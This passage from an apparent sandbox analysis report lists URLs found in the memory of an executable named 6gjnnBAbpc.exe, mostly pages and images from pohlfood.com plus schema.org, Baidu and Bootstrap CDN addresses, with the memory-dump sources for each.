00000000.00000003.325578885.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P-48x48.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/facebook-512-q1jbn3nkxzlg1s7t64rdmt1lwqmyqc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/in-q1jbnt182ik6r96y1xqb04n1y55vi627ix9trmwf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1163123914b.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-516652802b.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-926365420b.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/monthlyspec.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/pohl-14.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418358455.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418103318.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411274657.0000000008DD2000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411447471.0000000008DE7000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F&#038;format=xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418358455.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418103318.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411274657.0000000008DD2000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411447471.0000000008DE7000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/wp/v2/pages/158
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.rankmath.com/home
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org/WebPage
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sekcija-simer.gzs.si/vsebina/O-sekciji-SiMER
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.428728062.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sjbs.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css?ver=1.0.0
